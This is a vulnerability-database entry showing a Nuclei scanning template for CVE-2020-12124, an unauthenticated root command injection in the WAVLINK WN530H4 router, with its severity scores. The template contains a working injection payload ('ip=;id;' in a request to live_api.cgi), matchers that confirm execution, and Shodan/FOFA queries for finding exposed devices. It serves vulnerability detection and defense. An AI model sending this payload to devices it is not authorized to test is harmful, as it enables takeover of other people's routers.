Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-12124
HistoryDec 28, 2023 - 8:20 a.m.

WAVLINK WN530H4 live_api.cgi - Command Injection

2023-12-2808:20:08
ProjectDiscovery
github.com
25
cve
cve2020
rce
wavlink
command injection
linux
root authentication
remote execution
web vulnerability

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.946 High

EPSS

Percentile

99.3%

A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.
id: CVE-2020-12124

info:
  name: WAVLINK WN530H4 live_api.cgi - Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.
  reference:
    - https://github.com/db44k/CVE-2020-12124
    - https://cerne.xyz/bugs/CVE-2020-12124
    - https://www.wavlink.com/en_us/product/WL-WN530H4.html
    - https://github.com/Scorpion-Security-Labs/CVE-2020-12124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12124
    cwe-id: CWE-78
    epss-score: 0.94551
    epss-percentile: 0.99227
    cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavlink
    product: wn530h4_firmware
    shodan-query: http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2020,rce,wavlink
variables:
  str: "{{rand_base(3)}}"
  num: "{{rand_int(1, 10)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: word
        part: body
        words:
          - "WiFiBand"

      - type: status
        status:
          - 200
# digest: 490a004630440220795152aa32a35e7fbe4358c91ef9a136a0c2f45a24ea115ee6479ad52e2b2618022028ae4d2a2ed3350078252fa7da5ca698e60cd09022b6563061613a515bdc94fc:922c64590222798bb761d5b6d8e72950

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.946 High

EPSS

Percentile

99.3%

Related for NUCLEI:CVE-2020-12124